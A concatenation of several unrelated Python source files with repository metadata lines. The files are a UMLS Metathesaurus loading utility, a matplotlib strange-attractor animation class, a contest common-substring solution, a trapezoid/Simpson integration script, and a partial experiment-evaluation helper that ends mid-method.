"stt",
"sui",
"ispref",
"aui",
"saui",
"scui",
"sdui",
"sab",
"tty",
"code",
"alias",
"srl",
"suppress",
"cvf",
"null_col",
]
cols_to_use = [
"cui",
"sab",
"sdui",
"scui",
"alias",
"lang",
"ispref",
"tty",
# "lui",
# "sui",
"aui",
# "saui",
]
if self.debug:
df = next(
pd.read_csv(
os.path.join(self.umls_dir, "MRCONSO.RRF"),
delimiter="|",
names=col_names,
iterator=True,
# usecols=['cui','lang','sab','sdui','lui','sui','aui','saui','scui']
usecols=cols_to_use,
low_memory=False,
chunksize=10000,
)
)
else:
df = pd.read_csv(
os.path.join(self.umls_dir, "MRCONSO.RRF"),
delimiter="|",
names=col_names,
# usecols=['cui','lang','sab','sdui','lui','sui','aui','saui','scui']
usecols=cols_to_use,
low_memory=False,
# engine='pyarrow',
)
print("Load rankings")
rankings = pd.read_csv(
os.path.join(self.umls_dir, "MRRANK.RRF"),
delimiter="|",
names=["rank", "sab", "tty", "_", "_1"],
usecols=["rank", "sab", "tty"],
)
rankings["rank"] = -rankings["rank"] + 850
print("Merge rankings")
df = df.merge(rankings, on=["sab", "tty"])
self.umls = df
def _cache_umls(self):
"""
Cache processed UMLS dataframe for faster reloading
"""
if not self.debug and not self.using_cached:
cache_path = os.path.join(self.umls_dir, ".cached_df.feather")
print(f"Caching processed UMLS data to {cache_path}")
print(self.umls.index)
self.umls.reset_index(drop=True).to_feather(cache_path)
def get_canonical_name(
self,
ontologies_to_include: Union[str, list] = "all",
types_to_include: Union[str, list] = "all",
groups_to_include: Union[str, list] = "all",
use_umls_curies: bool = True,
mapping_cols: Optional[dict] = None,
prefixes: Optional[dict] = None,
remove_multigroup=False,
reverse=False,
lowercase=False,
):
"""
Get canonical name of entities in UMLS Metathesaurus
"""
df = self.filter_ontologies_and_types(
ontologies_to_include=ontologies_to_include,
types_to_include=types_to_include,
groups_to_include=groups_to_include,
remove_multigroup=remove_multigroup,
)
# Pick which set of CURIEs to use
if use_umls_curies:
df["identifier"] = df["cui"]
filtered = df[["identifier", "rank", "alias"]]
else:
subsets = []
for ontology in df.sab.unique():
mapping_col = ""
prefix = ""
if ontology in mapping_cols:
mapping_col = mapping_cols[ontology]
if ontology in prefixes:
prefix = prefixes[ontology]
subset = self._get_alias_single_subset(
df, ontology, mapping_col=mapping_col, prefix=prefix
)
subsets.append(subset[["identifier", "rank", "alias"]])
filtered = pd.concat(subsets).drop_duplicates()
if lowercase:
filtered["alias"] = filtered.alias.map(lambda x: x.lower())
filtered = filtered.drop_duplicates()
# Get output dict of CUI to Name mappings
output_dict = (
filtered.loc[filtered.groupby("identifier")["rank"].idxmin()]
.set_index("identifier")["alias"]
.to_dict()
)
return output_dict
def get_definition(
self,
ontologies_to_include: Union[str, list] = "all",
types_to_include: Union[str, list] = "all",
groups_to_include: Union[str, list] = "all",
use_umls_curies: bool = True,
mapping_cols: Optional[dict] = None,
prefixes: Optional[dict] = None,
remove_multigroup=False,
reverse=False,
lowercase=False,
):
"""
Get canonical name of entities in UMLS Metathesaurus
"""
print("Filtering by ontologies")
df = self.filter_ontologies_and_types(
ontologies_to_include=ontologies_to_include,
types_to_include=types_to_include,
groups_to_include=groups_to_include,
remove_multigroup=remove_multigroup,
)
print("Removing null definitions")
df = df.loc[~df['def'].isnull(),:]
# Pick which set of CURIEs to use
if use_umls_curies:
df["identifier"] = df["cui"]
filtered = df[["identifier", "rank", "def"]]
else:
subsets = []
for ontology in df.sab.unique():
mapping_col = ""
prefix = ""
if ontology in mapping_cols:
mapping_col = mapping_cols[ontology]
if ontology in prefixes:
prefix = prefixes[ontology]
subset = self._get_alias_single_subset(
df, ontology, mapping_col=mapping_col, prefix=prefix
)
subsets.append(subset[["identifier", "rank", "def"]])
filtered = pd.concat(subsets).drop_duplicates()
if lowercase:
filtered["def"] = filtered['def'].map(lambda x: x.lower())
filtered = filtered.drop_duplicates()
# Get output dict of CUI to Name mappings
output_dict = (
filtered.loc[filtered.groupby("identifier")["rank"].idxmin()]
.set_index("identifier")["def"]
.to_dict()
)
return output_dict
def get_types_and_groups(
self,
ontologies_to_include: Union[str, list] = "all",
types_to_include: Union[str, list] = "all",
groups_to_include: Union[str, list] = "all",
use_umls_curies: bool = True,
mapping_cols: Optional[dict] = None,
prefixes: Optional[dict] = None,
remove_multigroup=False,
reverse=False,
lowercase=False,
):
df = self.filter_ontologies_and_types(
ontologies_to_include=ontologies_to_include,
types_to_include=types_to_include,
groups_to_include=groups_to_include,
remove_multigroup=remove_multigroup,
)
# Pick which set of CURIEs to use
if use_umls_curies:
df["identifier"] = df["cui"]
filtered = df[["identifier", "rank", "tui", "group"]]
else:
subsets = []
for ontology in df.sab.unique():
mapping_col = ""
prefix = ""
if ontology in mapping_cols:
mapping_col = mapping_cols[ontology]
if ontology in prefixes:
prefix = prefixes[ontology]
subset = self._get_alias_single_subset(
df, ontology, mapping_col=mapping_col, prefix=prefix
)
subsets.append(subset[["identifier", "rank", "tui", "group"]])
filtered = pd.concat(subsets)
grouped = filtered.groupby('identifier')
id2types = grouped.tui.first().to_dict()
id2groups = grouped.group.first().to_dict()
return id2types, id2groups
def get_mapping(
self,
ontology_abbreviation="MSH",
reverse=False,
mapping_col="sdui",
umls_prefix="",
other_prefix="",
):
"""
Get cross-references between UMLS and another ongology
"""
# Load main UMLS file (MRCONSO.RRF)
# Filter down to desired ontology
filtered = (
self.umls.query("sab == @ontology_abbreviation")
.loc[:, ["cui", mapping_col]]
.dropna()
.drop_duplicates()
.reset_index(drop=True)
)
if umls_prefix != "":
filtered["cui"] = filtered["cui"].map(lambda x: umls_prefix + ":" + x)
if other_prefix != "":
filtered[mapping_col] = filtered[mapping_col].map(
lambda x: other_prefix + ":" + x
)
if reverse:
output = filtered.set_index(mapping_col).to_dict()["cui"]
else:
output = filtered.set_index("cui").to_dict()[mapping_col]
return output
def interalias_mapping(self, type_subset="gngm"):
"""
Get mapping between all terms with the same alias
"""
pass
# if hasattr(self.cui2type):
def _load_types(self):
"""
Load mapping from CUI to UMLS semantic type
"""
# Load type dataframe
print("Loading semantic types")
cui_type_df = pd.read_csv(
os.path.join(self.umls_dir, "MRSTY.RRF"),
usecols=[0, 1],
names=["cui", "tui"],
delimiter="|",
# engine='pyarrow'
)
self._load_type_abbrevs()
cui_type_df["group"] = cui_type_df["tui"].map(self.tui2group)
grouped = cui_type_df.groupby("cui")
# Get mapping from CUI to types
print("Mapping CUIs to types")
self.cui2types = grouped["tui"].progress_apply(list).to_dict()
# Get mapping from CUI to groups
print("Mapping CUIs to groups")
self.cui2groups = (
grouped["group"].progress_apply(lambda x: list(set(x))).to_dict()
)
def _load_type_abbrevs(self):
"""
Get type abbreviations and semantic groups
"""
# Map each TUI to a semantic group
self.tui2group = (
pd.read_csv(
os.path.join(self.umls_dir, "SemGroups.txt"),
sep="|",
usecols=[0, 2],
names=["group", "tui"],
)
.set_index("tui")
.to_dict()["group"]
)
self.semantic_groups = list(set(self.tui2group.values()))
# Mape each TUI to its abbreviaion/name
# Semantic network abbreviations
sem_network_cols = [
"row_type",
"tui",
"name",
"tree_index",
"desc",
"_1",
"clarification",
"_2",
"abbrev",
"inverse_relation",
"_3",
]
self.tui_type_abbreviations = pd.read_csv(
os.path.join(self.umls_dir, "semantic_network/SRDEF"),
sep="|",
names=sem_network_cols,
usecols=["row_type", "tui", "name", "desc", "abbrev"],
)
self.type2abbrev = (
self.tui_type_abbreviations[["tui", "abbrev"]]
.set_index("tui")
.to_dict()["abbrev"]
)
def _merge_types(self):
"""
Merge type information into UMLS dataframe
"""
print("Adding type information to UMLS dataframe")
self.umls["tui"] = self.umls["cui"].map(self.cui2types)
print("Adding semantic group informaiton to UMLS dataframe")
self.umls["group"] = self.umls["cui"].map(self.cui2groups)
def _load_type2name(self, umls_dir):
"""
Load mapping from semantic types to names/abbreviations
"""
pass
def _get_alias_single_subset(self, df, ontology, mapping_col="", prefix=""):
"""
Get CURIE -> alias mapping for a single subset of UMLS
"""
filtered = df.query("sab == @ontology")
inds = filtered.loc[:, [mapping_col, "alias"]].dropna().drop_duplicates().index
filtered = filtered.loc[inds, :].reset_index(drop=True)
filtered["identifier"] = filtered[mapping_col].map(lambda x: prefix + ":" + x)
return filtered
def list_groups(self):
"""
List available semantic groups
"""
return self.semantic_groups
def filter_ontologies_and_types(
self,
ontologies_to_include: Union[str, list] = "all",
types_to_include: Union[str, list] = "all",
groups_to_include: Union[str, list] = "all",
remove_multigroup=False,
):
# Pull correct subset of UMLS, if subsetting at all
# print(self.umls.columns)
if ontologies_to_include == "all":
df = self.umls.query('lang == "ENG"')
elif type(ontologies_to_include) == str:
df = self.umls.query('sab == @ontologies_to_include & lang == "ENG"')
else:
df = self.umls[self.umls.sab.isin(ontologies_to_include)].query(
'lang == "ENG"'
)
# Remove concepts with more than one group
if remove_multigroup:
df = df[df["group"].map(lambda x: len(x) == 1)]
# Filter by semantic group
if type(groups_to_include) == str:
if groups_to_include != "all":
raise ValueError('groups_to_include must be a list of strings or "all"')
elif type(groups_to_include) == list:
mask = df["group"].map(lambda x: any([y in groups_to_include for y in x]))
df = df[mask]
else:
raise TypeError("groups_to_include must be list or string")
# Filter by semantic type
if type(types_to_include) == str:
if types_to_include != "all":
raise ValueError('types_to_include must be a list of strings or "all"')
elif type(types_to_include) == list:
mask = df["tui"].map(lambda x: any([y in types_to_include for y in x]))
df = df[mask]
else:
raise TypeError("types_to_include must be list or string")
return df
def get_types(
self,
ontologies_to_include: Union[str, list] = "all",
types_to_include: Union[str, list] = "all",
groups_to_include: Union[str, list] = "all",
remove_multigroup=False,
):
"""
Get semantic types for UMLS entities
"""
df = self.filter_ontologies_and_types(
ontologies_to_include=ontologies_to_include,
types_to_include=types_to_include,
groups_to_include=groups_to_include,
remove_multigroup=remove_multigroup,
)
return df.groupby("cui").tui.first().to_dict()
def get_aliases(
self,
ontologies_to_include: Union[str, list] = "all",
types_to_include: Union[str, list] = "all",
groups_to_include: Union[str, list] = "all",
use_umls_curies: bool = True,
mapping_cols: Optional[dict] = None,
prefixes: Optional[dict] = None,
remove_multigroup=False,
reverse: bool = False,
lowercase: bool = False,
):
"""
Get mapping of CURIE -> aliases for all or a subset of UMLS entities
Parameters:
-----------------------------
ontologies_to_include:
Ontologies in UMLS to include in subset, default 'all'
types_to_include:
Semantic types to include in subset, default 'all'
groups_to_include:
Semantic groups to include in subset, default: 'all'
Semantic groups are more general than types and typicially
include multiple types.
use_umls_curies: bool, default True
Whether to use UMLS CUIs as unique identifiers.
If false, use CUIs subset ontologies.
mapping_cols:
Dict of which column to use for CURIEs for each ontology. If none
specified, sdui is used.
prefixes:
Dict of prefixes to use for each ontology. If none given, no prefixes
are used
reverse: bool, default False
If true, return mapping from aliases to CURIEs instead of vice versa
lowercase: bool, default False
If true, lowercase all aliases before deduplicating/returning
remove_multigroup: bool, default True
If true, remove entities that belong to multiple groups
"""
df = self.filter_ontologies_and_types(
ontologies_to_include=ontologies_to_include,
types_to_include=types_to_include,
groups_to_include=groups_to_include,
remove_multigroup=remove_multigroup,
)
# Pick which set of CURIEs to use
if use_umls_curies:
filtered = (
df.loc[:, ["cui", "alias"]]
.dropna()
.drop_duplicates()
.reset_index(drop=True)
).rename({"cui": "identifier"}, axis=1)
else:
subsets = []
for ontology in df.sab.unique():
mapping_col = ""
prefix = ""
if ontology in mapping_cols:
mapping_col = mapping_cols[ontology]
if ontology in prefixes:
prefix = prefixes[ontology]
subset = self._get_alias_single_subset(
df, ontology, mapping_col=mapping_col, prefix=prefix
)
subsets.append(subset[["identifier", "alias"]])
filtered = pd.concat(subsets).drop_duplicates()
if lowercase:
filtered["alias"] = filtered.alias.map(lambda x: x.lower())
filtered = filtered.drop_duplicates()
if reverse:
return filtered.groupby("alias")["identifier"].apply(list).to_dict()
else:
return filtered.groupby("identifier")["alias"].apply(list).to_dict()
def get_synsets(self, preferred_type="gngm"):
"""
Get mapping between all terms with the same alias
This is mostly to get mapping from proteins to their corresponding gene and vice-versa
"""
df = self.umls
df["type"] = df.tui.map(self.type2abbrev)
df["has_preferred_type"] = df["type"] == preferred_type
grouped = self.umls.groupby("alias")
# Semantic network abbreviations
# def get_semantic_type_hierarchy(umls_dir, tui):
# sem_network_cols = [
# "row_type",
# "tui",
# "name",
# "tree_index",
# "desc",
# "_1",
# "clarification",
# "_2",
# "abbrev",
# "inverse_relation",
# "_3",
# ]
# semantic_network = pd.read_csv(
# os.path.join(umls_dir, "semantic_network/SRDEF"),
# sep="|",
# names=sem_network_cols,
# usecols=["row_type", "tui", "name", "tree_index"],
# )
# tree_index_to_name = semantic_network.set_index('tree_index')['name'].to_dict()
# def read_sem_group():
# pass
# def download_umls():
# pass
| davidkartchner/biomedical-entity-linking | umls_utils.py | umls_utils.py | py | 22,206 | python | en | code | 2 | github-code | 13 |
33387389833 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from random import shuffle
import matplotlib
import matplotlib.pyplot as plt
import mpl_toolkits.mplot3d.axes3d as p3 # noqa: F401
import numpy as np
from matplotlib import animation
from more_itertools import peekable
from mpl_toolkits.mplot3d.art3d import Line3DCollection
from attractors import data
from attractors.utils.base import ATTRACTOR_PARAMS
from attractors.utils.colortable import get_continuous_cmap
from attractors.utils.des import DES
from attractors.utils.video import ffmpeg_video
try:
    import importlib.resources as pkg_resources
except ImportError:
    # Fallback backport for Python versions without importlib.resources.
    import importlib_resources as pkg_resources
# * load theme
# Load the bundled color themes once at import time from data/themes.json.
# NOTE(review): the file handle is never closed — consider a context manager.
raw_themes_data = pkg_resources.open_text(data, "themes.json")
themes = json.load(raw_themes_data)
class Attractor(DES):
    """Plotting/animation front-end for a strange attractor.

    Wraps the DES solver and keeps matplotlib state (figure, axes, theme,
    colormap and the prepared init/update callbacks) at *class* level, so
    ``set_animate_*``/``plot_*`` configure shared state that ``animate``
    then consumes.
    """

    # Shared plotting state, configured by set_theme/set_figure/set_animate_*.
    bgcolor = None
    palette = None
    fig, ax = None, None
    _update_func = None
    _points = None
    _init_func = None

    def __init__(self, attractor, **kwargs):
        """Initialize solver state for ``attractor``.

        Unspecified initial coordinates / parameters fall back to the
        defaults in ATTRACTOR_PARAMS.
        """
        self.attr = ATTRACTOR_PARAMS[attractor]
        self.init_coord = kwargs.get("init_coord", self.attr["init_coord"])
        self.params = {
            self.attr["params"][i]: kwargs.get(
                self.attr["params"][i], self.attr["default_params"][i]
            )
            for i in range(len(self.attr["params"]))
        }
        super(Attractor, self).__init__(attractor, self.init_coord, self.params)

    def __eq__(self, other):
        """Instances compare equal when they model the same attractor."""
        if not isinstance(other, Attractor):
            return NotImplemented
        return self.attractor == other.attractor

    @staticmethod
    def list_themes():
        """Return the bundled theme dictionary."""
        return themes

    @staticmethod
    def list_des():
        """Return the names of the available DES integration methods."""
        des_methods = set(dir(DES.__mro__[0])) - set(dir(DES.__mro__[1]))
        return [x for x in des_methods if not x.startswith("_")]

    @staticmethod
    def list_attractors():
        """Return the names of all known attractors."""
        return list(ATTRACTOR_PARAMS.keys())

    @staticmethod
    def list_params(attr):
        """Return the parameter names of attractor ``attr``."""
        return ATTRACTOR_PARAMS[attr]["params"]

    @classmethod
    def set_theme(cls, theme, bgcolor, palette):
        """Choose background color and palette.

        Precedence: explicit bgcolor/palette > theme dict > defaults
        (black background, "jet" colormap).  When only a theme is given,
        its background is used and the remaining colors are shuffled into
        a palette.
        """
        if all(v is None for v in [theme, bgcolor, palette]):
            cls.bgcolor = "#000000"
            cls.palette = "jet"
        elif all(v is None for v in [bgcolor, palette]) and theme is not None:
            palette_temp = list(theme.values())
            palette_temp.remove(theme["background"])
            palette_temp.insert(0, palette_temp.pop(-1))
            shuffle(palette_temp)
            cls.bgcolor = theme["background"]
            cls.palette = palette_temp
        else:
            if bgcolor is not None:
                cls.bgcolor = bgcolor
            if palette is not None:
                cls.palette = palette

    @classmethod
    def set_figure(cls, width, height, dpi):
        """Create the 3D figure/axes and derive the colormap from the palette."""
        cls.fig = plt.figure(figsize=(width, height), dpi=dpi)
        cls.ax = cls.fig.add_axes([0, 0, 1, 1], projection="3d")
        cls.ax.axis("off")
        cls.fig.set_facecolor(cls.bgcolor)
        cls.ax.set_facecolor(cls.bgcolor)
        # A string palette is a named matplotlib cmap; a list is turned into
        # a continuous custom cmap.
        if isinstance(cls.palette, str):
            cls.cmap = plt.cm.get_cmap(cls.palette)
        else:
            cls.cmap = get_continuous_cmap(cls.palette)

    @classmethod
    def set_limits(cls, xlim, ylim, zlim):
        """Set the 3D axis limits."""
        cls.ax.set_xlim(xlim)
        cls.ax.set_ylim(ylim)
        cls.ax.set_zlim(zlim)

    @classmethod
    def _wrap_set(cls, objs, kwargs):
        """Validate the inputs and configure theme, figure and axis limits."""
        assert all(
            x.peek().attractor == objs[0].peek().attractor for x in objs
        ), "All objects must be of the same attractor type"
        try:
            theme = themes[kwargs.get("theme")]
        except KeyError:
            theme = None
        Attractor.set_theme(
            theme,
            bgcolor=kwargs.get("bgcolor", None),
            palette=kwargs.get("palette", None),
        )
        Attractor.set_figure(
            width=kwargs.get("width", 16),
            # Bug fix: this previously read kwargs.get("width", 9), so a
            # user-supplied "height" was silently ignored.
            height=kwargs.get("height", 9),
            dpi=kwargs.get("dpi", 120),
        )
        attr = ATTRACTOR_PARAMS[objs[0].peek().attractor]
        Attractor.set_limits(
            xlim=kwargs.get("xlim", attr["xlim"]),
            ylim=kwargs.get("ylim", attr["ylim"]),
            zlim=kwargs.get("zlim", attr["zlim"]),
        )

    @classmethod
    def set_animate_multipoint(cls, *objs, **kwargs):
        """Prepare an animation of several attractor trajectories.

        Each trajectory gets its own color from the colormap; stores the
        init/update callbacks on the class for :meth:`animate`.
        """
        objs = [peekable(obj) for obj in objs]
        Attractor._wrap_set(objs, kwargs)
        colors = cls.cmap(np.linspace(0, 1, len(objs)))
        linekwargs = kwargs.get("linekwargs", {})
        pointkwargs = kwargs.get("pointkwargs", {})
        lines = sum(
            [
                cls.ax.plot([], [], [], "-", c=c, antialiased=True, **linekwargs)
                for c in colors
            ],
            [],
        )
        pts = sum(
            [cls.ax.plot([], [], [], "o", c=c, **pointkwargs) for c in colors], []
        )

        def init():
            # Start every line/point empty.
            for line, pt in zip(lines, pts):
                line.set_data_3d([], [], [])
                pt.set_data_3d([], [], [])
            return lines + pts

        # Longest trajectory determines the animation length.
        maxlen = len(max([obj.peek() for obj in objs], key=len))

        def update(i):
            for line, pt, k in zip(lines, pts, objs):
                s = next(k, None)
                if not s:
                    # This trajectory is exhausted; leave it as drawn.
                    continue
                if i == maxlen - 1:
                    # Manually close the figure once every trajectory has
                    # been fully animated.
                    plt.close(line.axes.figure)
                line.set_data_3d(
                    np.hstack(
                        (
                            np.array(line.get_data_3d()),
                            np.atleast_2d(np.array([s.X, s.Y, s.Z])).T,
                        )
                    )
                )
                pt.set_data_3d(s.X, s.Y, s.Z)
            # Slowly rotate the camera while animating.
            cls.ax.view_init(
                kwargs.get("elevationrate", 0.005) * i,
                kwargs.get("azimuthrate", 0.05) * i,
            )
            return lines + pts

        cls._update_func = update
        cls._init_func = init
        cls._points = maxlen
        return cls

    @classmethod
    def set_animate_gradient(cls, obj, **kwargs):
        """Prepare an animation of one trajectory colored along an axis.

        The trajectory is materialized up front because the full coordinate
        array is needed to compute the color gradient.
        """
        obj = peekable(obj)
        Attractor._wrap_set([obj], kwargs)
        objlist = []
        for s in obj:
            objlist.append([s.X, s.Y, s.Z])
        objlist = np.array(objlist)
        linekwargs = kwargs.get("linekwargs", {})
        pointkwargs = kwargs.get("pointkwargs", {})
        line = Line3DCollection([], cmap=cls.cmap, **linekwargs)
        cls.ax.add_collection3d(line)
        # Color by the chosen coordinate axis (default Z).
        val = {"X": 0, "Y": 1, "Z": 2}
        colorarray = objlist[:, val[kwargs.get("gradientaxis", "Z")]]
        (pt,) = cls.ax.plot([], [], [], "o", **pointkwargs)
        line.set_array(np.array(colorarray))
        colors = line.to_rgba(colorarray)
        del colorarray

        def init():
            line.set_segments([])
            pt.set_data_3d([], [], [])
            return line, pt

        def update(i):
            # Rebuild the segment list for the first i points each frame.
            pts = np.array(objlist[:i]).reshape(-1, 1, 3)
            segs = np.concatenate([pts[:-1], pts[1:]], axis=1)
            line.set_segments(segs)
            pt.set_data_3d([objlist[i, 0]], [objlist[i, 1]], [objlist[i, 2]])
            pt.set_color(colors[i])
            cls.ax.view_init(
                kwargs.get("elevationrate", 0.005) * i,
                kwargs.get("azimuthrate", 0.05) * i,
            )
            return line, pt

        points = len(objlist)
        cls._update_func = update
        cls._init_func = init
        cls._points = points
        return cls

    @classmethod
    def animate(cls, **kwargs):
        """Run the animation prepared by a ``set_animate_*`` call.

        With ``live=True`` shows (or returns) a FuncAnimation; otherwise
        renders an mp4 via ffmpeg using the Agg backend.
        """
        if kwargs.get("live", False):
            anim = animation.FuncAnimation(
                cls.fig,
                cls._update_func,
                init_func=cls._init_func,
                interval=1000 / kwargs.get("fps", 60),
                blit=False,
            )
            if kwargs.get("show", True):
                plt.show()
            else:
                return anim
        else:
            matplotlib.use("Agg")
            ffmpeg_video(
                cls.fig,
                cls._update_func,
                cls._points,
                kwargs.get("fps", 60),
                kwargs.get("outf", "output.mp4"),
            )

    @classmethod
    def plot_gradient(cls, index, obj, **kwargs):
        """Draw a static gradient-colored trajectory up to ``index``.

        Returns the configured 3D axes.
        """
        obj = peekable(obj)
        Attractor._wrap_set([obj], kwargs)
        objlist = [[s.X, s.Y, s.Z] for s in obj]
        objlist = np.array(objlist)
        linekwargs = kwargs.get("linekwargs", {})
        pointkwargs = kwargs.get("pointkwargs", {})
        line = Line3DCollection([], cmap=cls.cmap, **linekwargs)
        cls.ax.add_collection3d(line)
        val = {"X": 0, "Y": 1, "Z": 2}
        colorarray = objlist[:, val[kwargs.get("gradientaxis", "Z")]]
        (pt,) = cls.ax.plot([], [], [], "o", **pointkwargs)
        line.set_array(np.array(colorarray))
        colors = line.to_rgba(colorarray)
        pts = np.array(objlist[:index]).reshape(-1, 1, 3)
        segs = np.concatenate([pts[:-1], pts[1:]], axis=1)
        line.set_segments(segs)
        pt.set_data_3d([objlist[index, 0]], [objlist[index, 1]], [objlist[index, 2]])
        pt.set_color(colors[index])
        cls.fig.canvas.draw()
        return cls.ax

    @classmethod
    def plot_multipoint(cls, index, *objs, **kwargs):
        """Draw several static trajectories up to time step ``index``.

        Returns the configured 3D axes.
        """
        objs = [peekable(obj) for obj in objs]
        Attractor._wrap_set(objs, kwargs)
        colors = cls.cmap(np.linspace(0, 1, len(objs)))
        linekwargs = kwargs.get("linekwargs", {})
        pointkwargs = kwargs.get("pointkwargs", {})
        lines = sum(
            (
                cls.ax.plot([], [], [], "-", c=c, antialiased=True, **linekwargs)
                for c in colors
            ),
            [],
        )
        pts = sum(
            (cls.ax.plot([], [], [], "o", c=c, **pointkwargs) for c in colors), []
        )
        for line, pt, k in zip(lines, pts, objs):
            tx, ty, tz = [], [], []
            for s in k:
                if s.ts == index:
                    break
                tx += [s.X]
                ty += [s.Y]
                tz += [s.Z]
            line.set_data_3d(tx, ty, tz)
            # NOTE(review): assumes every trajectory yields at least one
            # state; an empty iterator would leave ``s`` unbound here.
            pt.set_data_3d(s.X, s.Y, s.Z)
        cls.fig.canvas.draw()
        return cls.ax
| simrit1/attractors | attractors/attractor.py | attractor.py | py | 10,423 | python | en | code | 0 | github-code | 13 |
# Uppercase alphabet used to keep only letters from the input.
alphabet = 'QWERTYUIOPASDFGHJKLZXCVBNM'
fin = open('sr-sample-input.txt')
fout = open('output.txt', 'w')
# Strip the trailing newline from each input line (if present).
lines = [(i[:-1] if i[-1]=='\n' else i) for i in fin.readlines()]
# Uppercase every character and drop anything that is not a letter.
lines = [''.join(['' if c.capitalize() not in alphabet else c.capitalize() for c in i]) for i in lines]
def ADF(a, b):
    """Return the total matched length between strings a and b.

    Greedy recursive scheme: find the longest common substring (on ties,
    prefer the lexicographically smallest substring of ``a``), then recurse
    independently on the text to the left and to the right of the match in
    both strings.  Exponential in the worst case; fine for contest-sized
    inputs.
    """
    # maxlen/maxpos track the best match found so far; -1 means "none yet".
    maxlen, maxpos = -1, (0, 0)
    if (len(a)*len(b) == 0): return 0
    # Try every substring length and every pair of start positions.
    for sublen in range(1, min(len(a),len(b))+1):
        for i in range(len(a)-sublen+1):
            for j in range(len(b)-sublen+1):
                if a[i:i+sublen] == b[j:j+sublen]:
                    if sublen == maxlen:
                        # Tie on length: keep the lexicographically smaller
                        # substring of ``a`` (order-dependent tie-break).
                        if a[i:i+sublen]<a[maxpos[0]:maxpos[0]+maxlen]:
                            maxpos = (i, j)
                    else:
                        maxlen = sublen
                        maxpos = (i, j)
    if maxlen<0: return 0
    # Count the match, then solve the left and right remainders separately.
    return maxlen + ADF(a[0:maxpos[0]],b[0:maxpos[1]]) + ADF(a[maxpos[0]+maxlen:],b[maxpos[1]+maxlen:])
# The input holds 5 test cases, two consecutive lines per case.
for i in range(5):
    str1, str2 = lines[i*2], lines[i*2+1]
    print(ADF(str1,str2), file=fout)
fin.close()
fout.close()
| u8y7541/acsl | 2020senior2/2020senior2.py | 2020senior2.py | py | 913 | python | en | code | 0 | github-code | 13 |
74527289938 | # -*- coding: utf-8 -*-
"""
Created on Thu Jan 9 16:03:15 2020
@author: Hugo
"""
import math
# Arc-length integrand sqrt(1 + (y')^2) for y = e^(2.5 x), where y' = 2.5 e^(2.5 x).
f = lambda x: (1 +(2.5*math.e**(2.5*x))**2 )**(1/2)
# NOTE(review): g is mathematically the same integrand written with sqrt/pow;
# it is not referenced in the code below — presumably an alternative kept for
# comparison.
g = lambda x: math.sqrt(1 + pow(2.5 * pow(math.e, 2.5 * x), 2))
def trapezios(f,a,b,h):
    """Composite trapezoidal approximation of the integral of f over [a, b].

    The interval is split into n = (b - a) / h sub-intervals; endpoints are
    weighted once and every interior node twice.
    """
    n = int((b - a) / h)
    acc = f(a) + f(b)
    for node in (a + i * h for i in range(1, n)):
        acc += 2 * f(node)
    return acc * h / 2
def simpson(f,a,b,h):
    """Composite Simpson's rule approximation of the integral of f over [a, b].

    Interior nodes alternate weights 4 (odd index) and 2 (even index);
    endpoints are weighted once.  Assumes (b - a) / h is an even integer.
    """
    n = int((b - a) / h)
    acc = f(a) + f(b)
    for i in range(1, n):
        weight = 2 if i % 2 == 0 else 4
        acc += weight * f(a + i * h)
    return acc * h / 3
# Integration interval [0, 1] and coarsest step size.
a = 0
b = 1
h = 0.125
# Trapezoidal estimates at h, h/2 and h/4 for Richardson-style analysis.
St = trapezios(f,a,b,h)
St1 = trapezios(f,a,b,h/2)
St2 = trapezios(f,a,b,h/4)
# Convergence quotient (≈4 for a 2nd-order method) and error estimate.
Qct = (St1-St)/(St2-St1)
Et = (St2-St1)/3
# Simpson estimates at the same three step sizes.
Ss = simpson(f,a,b,h)
Ss1 = simpson(f,a,b,h/2)
Ss2 = simpson(f,a,b,h/4)
# Convergence quotient (≈16 for a 4th-order method) and error estimate.
Qcs = (Ss1-Ss)/(Ss2-Ss1)
Es = (Ss2-Ss1)/15
# Report: step sizes, the paired estimates, quotients and error estimates.
print(h,h)
print(h/2,h/2)
print(h/4,h/4)
print(St,Ss)
print(St1,Ss1)
print(St2,Ss2)
print(Qct,Qcs)
print(Et,Es)
| Hugomguima/FEUP | 1st_Year/1st_Semestre/Mnum/Exame/Exame 2017/Pergunta2.py | Pergunta2.py | py | 1,016 | python | en | code | 0 | github-code | 13 |
40927887543 | import pandas as pd
from lib.exp.summary import Summary
from lib.exp.evaluator.preproc_evaluator import PreprocEvaluator
from lib.exp.pre import Const
from lib.exp.pre import Reducer
from lib.exp.evaluator.accuracy import Accuracy
class _Exts(object):
    """Mixin of data-extraction helpers for preprocessing plots.

    NOTE(review): methods read ``self.root`` and ``self.name``, which are
    not set here — presumably provided by the class this mixin is combined
    with; confirm against the composing plotter class.
    """
    def __init__(self):
        pass
    def __slide_count(self):
        """Return the number of slides reported by the experiment summary."""
        self._reload_obj("summary")
        return self.su_.info(self.root, self.name).n_slides
    def _reload_obj(self, obj_name):
        """(Re)create one of the helper objects (reducer/preproc/summary)."""
        if obj_name == "reducer":
            self.re_ = Reducer(self.root, self.name)
        elif obj_name == "preproc":
            self.pp_ = PreprocEvaluator(self.root, self.name)
        elif obj_name == "summary":
            self.su_ = Summary()
    def __find_dof(self, key):
        """Look up the frame-id offset registered for reducer key ``key``."""
        # NOTE(review): looks like Const.Rkeys/Doffsets are parallel arrays
        # and this is a boolean-mask lookup — confirm against Const.
        dk = Const.Rkeys == key
        di = Const.Doffsets[dk]
        return di
    def _get_reduced_data(self, rk, dof):
        """Load reduced data for key ``rk``, shifting frame ids by ``dof``."""
        self._reload_obj("reducer")
        prk = "/nr/{}".format(rk)
        rdf = self.re_.load(prk)
        rdf.frame_id = rdf.frame_id - dof
        return rdf
    def _get_reduced_slides(self, rk, doffset=0):
        """Return reduced data for ``rk`` converted to per-slide form."""
        rdf = self._get_reduced_data(rk, doffset)
        self._reload_obj("preproc")
        sdf = self.pp_.ac_reduced_to_slides(rdf)
        return sdf
    def _get_reduced_segments(self, rk):
        """Return reduced data for ``rk`` converted to segment form."""
        dof = self.__find_dof(rk)
        rdf = self._get_reduced_data(rk, dof)
        self._reload_obj("preproc")
        sdf = self.pp_.ac_segments_df(rdf)
        return sdf
    def _get_slide_coverages(self, keys):
        """
        Load slide coverage and slide hitratio data
        """
        self._reload_obj("reducer")
        self._reload_obj("preproc")
        pda = []
        # zipkey yields (index, display name, reducer key, frame offset).
        for ri, na, rk, dof in self.re_.zipkey(keys):
            prk = "/nr/{}".format(rk)
            red = self.re_.load(prk)
            red.frame_id = red.frame_id - dof
            pdc = self.pp_.preview(red, self.__slide_count())
